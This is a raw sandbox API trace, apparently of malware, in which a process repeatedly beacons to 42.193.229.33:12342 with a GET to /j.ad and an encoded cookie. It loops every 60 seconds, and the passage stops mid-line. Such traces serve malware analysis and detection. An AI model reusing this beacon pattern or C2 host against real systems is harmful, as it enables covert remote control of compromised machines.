[0120.726] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x14) returned 0x1f53640 [0120.727] GetLastError () returned 0x2efd [0120.727] SetLastError (dwErrCode=0x2efd) [0120.727] GetLastError () returned 0x2efd [0120.727] SetLastError (dwErrCode=0x2efd) [0120.727] GetLastError () returned 0x2efd [0120.727] SetLastError (dwErrCode=0x2efd) [0120.727] GetLastError () returned 0x2efd [0120.727] SetLastError (dwErrCode=0x2efd) [0120.727] GetLastError () returned 0x2efd [0120.727] SetLastError (dwErrCode=0x2efd) [0120.727] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0120.727] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0120.727] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0120.727] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0120.728] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0120.728] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0120.728] GetLastError () returned 0x0 [0120.728] SetLastError (dwErrCode=0x0) [0120.728] htonl (hostlong=0x7000000) returned 0x7 [0120.728] htonl (hostlong=0x0) returned 0x0 [0120.728] htonl (hostlong=0x3000000) returned 0x3 [0120.728] htonl (hostlong=0x6000000) returned 0x6 [0120.728] htonl (hostlong=0x6000000) returned 0x6 [0120.728] GetLastError () returned 0x0 [0120.728] SetLastError (dwErrCode=0x0) [0120.728] htonl (hostlong=0x0) returned 0x0 [0120.728] GetLastError () returned 0x0 [0120.728] SetLastError (dwErrCode=0x0) [0120.728] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0120.728] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0122.707] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0122.707] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0122.707] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0122.707] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0122.707] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0122.707] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0122.707] Sleep (dwMilliseconds=0xea60) [0122.720] GetLastError () returned 0x2efd [0122.720] SetLastError (dwErrCode=0x2efd) [0122.720] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53640 | out: hHeap=0x1f50000) returned 1 [0122.720] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x14) returned 0x1f53640 [0122.720] GetLastError () returned 0x2efd [0122.720] SetLastError (dwErrCode=0x2efd) [0122.720] GetLastError () returned 0x2efd [0122.720] SetLastError (dwErrCode=0x2efd) [0122.720] GetLastError () returned 0x2efd [0122.720] SetLastError (dwErrCode=0x2efd) [0122.720] GetLastError () returned 0x2efd [0122.720] SetLastError (dwErrCode=0x2efd) [0122.720] GetLastError () returned 0x2efd [0122.721] SetLastError (dwErrCode=0x2efd) [0122.721] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0122.721] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0122.721] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0122.721] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0122.721] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0122.721] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0122.721] GetLastError () returned 0x0 [0122.721] SetLastError (dwErrCode=0x0) [0122.721] htonl (hostlong=0x7000000) returned 0x7 [0122.721] htonl (hostlong=0x0) returned 0x0 [0122.721] htonl (hostlong=0x3000000) returned 0x3 [0122.721] htonl (hostlong=0x6000000) returned 0x6 [0122.721] htonl (hostlong=0x6000000) returned 0x6 [0122.721] GetLastError () returned 0x0 [0122.721] SetLastError (dwErrCode=0x0) [0122.721] htonl (hostlong=0x0) returned 0x0 [0122.721] GetLastError () returned 0x0 [0122.721] SetLastError (dwErrCode=0x0) [0122.721] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0122.721] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0124.707] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0124.708] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0124.708] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0124.709] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0124.710] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0124.710] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0124.711] Sleep (dwMilliseconds=0xea60) [0124.714] GetLastError () returned 0x2efd [0124.714] SetLastError (dwErrCode=0x2efd) [0124.714] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53640 | out: hHeap=0x1f50000) returned 1 [0124.714] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x14) returned 0x1f53640 [0124.714] GetLastError () returned 0x2efd [0124.714] SetLastError (dwErrCode=0x2efd) [0124.714] GetLastError () returned 0x2efd [0124.714] SetLastError (dwErrCode=0x2efd) [0124.714] GetLastError () returned 0x2efd [0124.714] SetLastError (dwErrCode=0x2efd) [0124.714] GetLastError () returned 0x2efd [0124.714] SetLastError (dwErrCode=0x2efd) [0124.714] GetLastError () returned 0x2efd [0124.714] SetLastError (dwErrCode=0x2efd) [0124.715] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0124.715] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0124.715] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0124.715] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0124.715] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0124.715] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0124.715] GetLastError () returned 0x0 [0124.715] SetLastError (dwErrCode=0x0) [0124.716] htonl (hostlong=0x7000000) returned 0x7 [0124.716] htonl (hostlong=0x0) returned 0x0 [0124.717] htonl (hostlong=0x3000000) returned 0x3 [0124.717] htonl (hostlong=0x6000000) returned 0x6 [0124.717] htonl (hostlong=0x6000000) returned 0x6 [0124.717] GetLastError () returned 0x0 [0124.717] SetLastError (dwErrCode=0x0) [0124.718] htonl (hostlong=0x0) returned 0x0 [0124.719] GetLastError () returned 0x0 [0124.719] SetLastError (dwErrCode=0x0) [0124.719] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0124.719] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0126.686] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0126.686] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0126.686] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0126.686] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0126.686] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0126.686] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0126.686] Sleep (dwMilliseconds=0xea60) [0126.694] GetLastError () returned 0x2efd [0126.694] SetLastError (dwErrCode=0x2efd) [0126.694] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53640 | out: hHeap=0x1f50000) returned 1 [0126.694] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x14) returned 0x1f53640 [0126.694] GetLastError () returned 0x2efd [0126.694] SetLastError (dwErrCode=0x2efd) [0126.694] GetLastError () returned 0x2efd [0126.695] SetLastError (dwErrCode=0x2efd) [0126.695] GetLastError () returned 0x2efd [0126.695] SetLastError (dwErrCode=0x2efd) [0126.695] GetLastError () returned 0x2efd [0126.695] SetLastError (dwErrCode=0x2efd) [0126.695] GetLastError () returned 0x2efd [0126.695] SetLastError (dwErrCode=0x2efd) [0126.695] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0126.695] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0126.695] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0126.695] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0126.696] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0126.696] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0126.696] GetLastError () returned 0x0 [0126.696] SetLastError (dwErrCode=0x0) [0126.696] htonl (hostlong=0x7000000) returned 0x7 [0126.696] htonl (hostlong=0x0) returned 0x0 [0126.696] htonl (hostlong=0x3000000) returned 0x3 [0126.696] htonl (hostlong=0x6000000) returned 0x6 [0126.696] htonl (hostlong=0x6000000) returned 0x6 [0126.696] GetLastError () returned 0x0 [0126.696] SetLastError (dwErrCode=0x0) [0126.696] htonl (hostlong=0x0) returned 0x0 [0126.696] GetLastError () returned 0x0 [0126.696] SetLastError (dwErrCode=0x0) [0126.696] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0126.696] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0128.676] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0128.676] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0128.676] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0128.676] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0128.677] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0128.677] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0128.677] Sleep (dwMilliseconds=0xea60) [0128.695] GetLastError () returned 0x2efd [0128.696] SetLastError (dwErrCode=0x2efd) [0128.696] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53640 | out: hHeap=0x1f50000) returned 1 [0128.696] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x14) returned 0x1f53640 [0128.696] GetLastError () returned 0x2efd [0128.696] SetLastError (dwErrCode=0x2efd) [0128.696] GetLastError () returned 0x2efd [0128.696] SetLastError (dwErrCode=0x2efd) [0128.696] GetLastError () returned 0x2efd [0128.696] SetLastError (dwErrCode=0x2efd) [0128.696] GetLastError () returned 0x2efd [0128.696] SetLastError (dwErrCode=0x2efd) [0128.696] GetLastError () returned 0x2efd [0128.696] SetLastError (dwErrCode=0x2efd) [0128.696] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0128.697] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0128.697] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0128.697] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0128.697] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0128.697] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0128.697] GetLastError () returned 0x0 [0128.697] SetLastError (dwErrCode=0x0) [0128.697] htonl (hostlong=0x7000000) returned 0x7 [0128.697] htonl (hostlong=0x0) returned 0x0 [0128.697] htonl (hostlong=0x3000000) returned 0x3 [0128.697] htonl (hostlong=0x6000000) returned 0x6 [0128.697] htonl (hostlong=0x6000000) returned 0x6 [0128.697] GetLastError () returned 0x0 [0128.697] SetLastError (dwErrCode=0x0) [0128.697] htonl (hostlong=0x0) returned 0x0 [0128.697] GetLastError () returned 0x0 [0128.697] SetLastError (dwErrCode=0x0) [0128.698] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0128.698] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0130.675] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0130.675] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0130.675] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0130.675] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0130.675] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0130.675] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0130.675] Sleep (dwMilliseconds=0xea60) [0130.688] GetLastError () returned 0x2efd [0130.690] SetLastError (dwErrCode=0x2efd) [0130.690] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53640 | out: hHeap=0x1f50000) returned 1 [0130.690] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x14) returned 0x1f53640 [0130.690] GetLastError () returned 0x2efd [0130.690] SetLastError (dwErrCode=0x2efd) [0130.690] GetLastError () returned 0x2efd [0130.690] SetLastError (dwErrCode=0x2efd) [0130.690] GetLastError () returned 0x2efd [0130.690] SetLastError (dwErrCode=0x2efd) [0130.690] GetLastError () returned 0x2efd [0130.691] SetLastError (dwErrCode=0x2efd) [0130.691] GetLastError () returned 0x2efd [0130.691] SetLastError (dwErrCode=0x2efd) [0130.691] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0130.691] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0130.691] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0130.691] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0130.692] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0130.692] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0130.692] GetLastError () returned 0x0 [0130.692] SetLastError (dwErrCode=0x0) [0130.692] htonl (hostlong=0x7000000) returned 0x7 [0130.692] htonl (hostlong=0x0) returned 0x0 [0130.692] htonl (hostlong=0x3000000) returned 0x3 [0130.692] htonl (hostlong=0x6000000) returned 0x6 [0130.692] htonl (hostlong=0x6000000) returned 0x6 [0130.692] GetLastError () returned 0x0 [0130.692] SetLastError (dwErrCode=0x0) [0130.692] htonl (hostlong=0x0) returned 0x0 [0130.692] GetLastError () returned 0x0 [0130.692] SetLastError (dwErrCode=0x0) [0130.692] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0130.693] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0132.674] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0132.674] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0132.675] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0132.675] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0132.675] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0132.675] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0132.675] Sleep (dwMilliseconds=0xea60) [0132.690] GetLastError () returned 0x2efd [0132.690] SetLastError (dwErrCode=0x2efd) [0132.691] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53640 | out: hHeap=0x1f50000) returned 1 [0132.691] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x14) returned 0x1f53640 [0132.691] GetLastError () returned 0x2efd [0132.691] SetLastError (dwErrCode=0x2efd) [0132.691] GetLastError () returned 0x2efd [0132.691] SetLastError (dwErrCode=0x2efd) [0132.691] GetLastError () returned 0x2efd [0132.691] SetLastError (dwErrCode=0x2efd) [0132.691] GetLastError () returned 0x2efd [0132.691] SetLastError (dwErrCode=0x2efd) [0132.691] GetLastError () returned 0x2efd [0132.691] SetLastError (dwErrCode=0x2efd) [0132.691] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0132.692] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0132.692] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0132.692] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0132.692] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0132.692] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0132.692] GetLastError () returned 0x0 [0132.692] SetLastError (dwErrCode=0x0) [0132.692] htonl (hostlong=0x7000000) returned 0x7 [0132.692] htonl (hostlong=0x0) returned 0x0 [0132.692] htonl (hostlong=0x3000000) returned 0x3 [0132.692] htonl (hostlong=0x6000000) returned 0x6 [0132.693] htonl (hostlong=0x6000000) returned 0x6 [0132.693] GetLastError () returned 0x0 [0132.693] SetLastError (dwErrCode=0x0) [0132.693] htonl (hostlong=0x0) returned 0x0 [0132.693] GetLastError () returned 0x0 [0132.693] SetLastError (dwErrCode=0x0) [0132.693] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0132.693] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: FWZqwaMnmmxHF39MBlhtJf8lOfw+/ioROYOV6abi6mzy1vS/oPJEW8F5so4oCzhLQrsCJAU8dmR/aP8X3eABV+lQUDV9mT9mWZjh0w84NbsnF4EKvIzfYQXqa2A+n18s7B8jZDjK+EpL1xvttfoSNtWVxlO+Xn8E2GK5EYYACTw=\r\n", dwHeadersLength=0xb6, lpOptional=0x2577790*, dwOptionalLength=0x0) returned 0 [0134.694] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x2576b90 | out: hHeap=0x1f50000) returned 1 [0134.694] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f5bce8 | out: hHeap=0x1f50000) returned 1 [0134.694] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x13, lpBuffer=0x2ef768, lpdwBufferLength=0x2ef354, lpdwIndex=0x0 | out: lpBuffer=0x2ef768*, lpdwBufferLength=0x2ef354*=0x1, lpdwIndex=0x0) returned 1 [0134.694] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0134.694] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0134.694] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0134.694] Sleep (dwMilliseconds=0xea60) [0134.699] GetLastError () returned 0x2efd [0134.699] SetLastError (dwErrCode=0x2efd) [0134.699] HeapFree (in: hHeap=0x1f50000, dwFlags=0x0, lpMem=0x1f53640 | out: hHeap=0x1f50000) returned 1 [0134.699] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x14) returned 0x1f53640 [0134.699] GetLastError () returned 0x2efd [0134.700] SetLastError (dwErrCode=0x2efd) [0134.700] GetLastError () returned 0x2efd [0134.700] SetLastError (dwErrCode=0x2efd) [0134.700] GetLastError () returned 0x2efd [0134.700] SetLastError (dwErrCode=0x2efd) [0134.700] GetLastError () returned 0x2efd [0134.700] SetLastError (dwErrCode=0x2efd) [0134.700] GetLastError () returned 0x2efd [0134.700] SetLastError (dwErrCode=0x2efd) [0134.700] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0134.700] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0134.701] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x2ef860*, dwBufferLength=0x4) returned 1 [0134.701] InternetConnectA (hInternet=0xcc0004, lpszServerName="42.193.229.33", nServerPort=0x3036, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1e2c58) returned 0xcc0008 [0134.701] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x10) returned 0x1f5bce8 [0134.701] RtlAllocateHeap (HeapHandle=0x1f50000, Flags=0x0, Size=0x6c00) returned 0x2576b90 [0134.701] GetLastError () returned 0x0 [0134.701] SetLastError (dwErrCode=0x0) [0134.701] htonl (hostlong=0x7000000) returned 0x7 [0134.701] htonl (hostlong=0x0) returned 0x0 [0134.701] htonl (hostlong=0x3000000) returned 0x3 [0134.701] htonl (hostlong=0x6000000) returned 0x6 [0134.701] htonl (hostlong=0x6000000) returned 0x6 [0134.701] GetLastError () returned 0x0 [0134.701] SetLastError (dwErrCode=0x0) [0134.701] htonl (hostlong=0x0) returned 0x0 [0134.701] GetLastError () returned 0x0 [0134.702] SetLastError (dwErrCode=0x0) [0134.702] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/j.ad", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x2ef328*="*/*", dwFlags=0x84480200, dwContext=0x1e2c58) returned 0xcc000c [0134.702] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Cookie: 